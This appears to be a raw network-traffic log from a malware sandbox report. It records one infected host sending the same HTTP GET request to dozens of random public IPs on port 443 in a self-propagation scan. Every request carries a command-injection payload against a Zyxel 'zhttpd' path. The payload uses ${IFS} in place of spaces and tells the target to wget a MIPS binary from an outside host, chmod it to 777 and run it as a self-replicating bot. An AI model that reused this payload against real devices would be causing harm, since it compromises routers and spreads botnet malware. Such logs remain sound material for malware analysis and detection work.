                                                        Feb 2, 2024 06:21:28.297509909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8854192.168.2.1456172189.179.169.203443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.297557116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8855192.168.2.1457252167.84.87.178443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.297583103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8856192.168.2.1455776188.213.33.88443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.297625065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8857192.168.2.1447606128.102.22.225443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.297663927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8858192.168.2.1440612190.140.194.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.297688961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8859192.168.2.145743419.16.201.69443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.297732115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8860192.168.2.1448166131.241.57.116443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.297770023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8861192.168.2.1453220129.32.185.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.297806978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8862192.168.2.1436398172.79.94.104443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.297867060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8863192.168.2.1437630148.71.247.2443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.297894955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8864192.168.2.1441010108.224.166.237443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.297929049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8865192.168.2.1446850204.81.13.55443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.297957897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8866192.168.2.144916088.114.134.97443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.298017979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8867192.168.2.1433124192.42.176.172443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.298029900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8868192.168.2.1452220189.128.25.38443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.298077106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8869192.168.2.1451744217.192.209.75443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.298111916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8870192.168.2.1455432126.233.243.46443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.298171043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8871192.168.2.144864688.68.79.22443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.298193932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8872192.168.2.1438142124.108.1.158443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.298259020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8873192.168.2.1444646175.97.7.85443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.298288107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8874192.168.2.1443640208.126.122.5443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.298331022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8875192.168.2.145084214.59.183.48443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.298377991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8876192.168.2.144661484.33.187.114443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.298407078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8877192.168.2.1453954108.207.189.231443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.298445940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8878192.168.2.1434446218.143.44.245443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.298512936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8879192.168.2.143309076.50.103.219443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.298553944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8880192.168.2.1453140161.139.72.235443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.298583031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8881192.168.2.145713872.253.107.182443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.298613071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8882192.168.2.143767671.56.95.10443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.298650026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8883192.168.2.143680499.62.239.45443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.298695087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8884192.168.2.144364061.137.226.102443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.298741102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8885192.168.2.1459714218.205.90.46443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.298773050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8886192.168.2.1436246165.123.165.116443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.298825026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8887192.168.2.145909064.10.50.162443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.298849106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8888192.168.2.143576672.212.174.113443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.298881054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8889192.168.2.1446714220.189.127.90443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.298933983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8890192.168.2.144879662.237.125.83443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.298952103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8891192.168.2.1450026157.9.8.79443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.299004078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8892192.168.2.144634858.98.122.243443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.299056053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8893192.168.2.144043414.247.156.172443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.299099922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8894192.168.2.144049080.30.145.166443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.299125910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8895192.168.2.1452620182.147.155.44443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.299151897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8896192.168.2.1450178181.131.97.92443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.299185991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8897192.168.2.145980018.31.130.47443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.299217939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8898192.168.2.1441200146.170.233.43443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.299283028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8899192.168.2.144861618.116.67.25443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.299329996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8900192.168.2.1458976164.98.156.173443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.299354076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8901192.168.2.1442890202.33.192.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.299391031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8902192.168.2.145795246.151.197.144443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.299448013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8903192.168.2.143313449.218.148.83443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.299477100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8904192.168.2.1459570104.58.215.30443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.299496889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8905192.168.2.1453600104.137.92.89443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.299530983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8906192.168.2.1438152128.155.42.211443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.299577951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8907192.168.2.1445348123.217.94.194443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.299587965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8908192.168.2.1456940208.67.247.233443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.299644947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8909192.168.2.1446832197.182.182.92443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.299683094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8910192.168.2.1460074104.14.213.88443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.299716949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8911192.168.2.145255420.181.12.190443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.299757004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8912192.168.2.1444528151.70.87.73443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.299788952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8913192.168.2.145093818.85.210.203443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.299844027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8914192.168.2.1433740177.45.236.85443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.299900055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8915192.168.2.143651014.207.160.212443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.299933910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8916192.168.2.144804865.231.247.182443
                                                        TimestampBytes transferredDirectionData
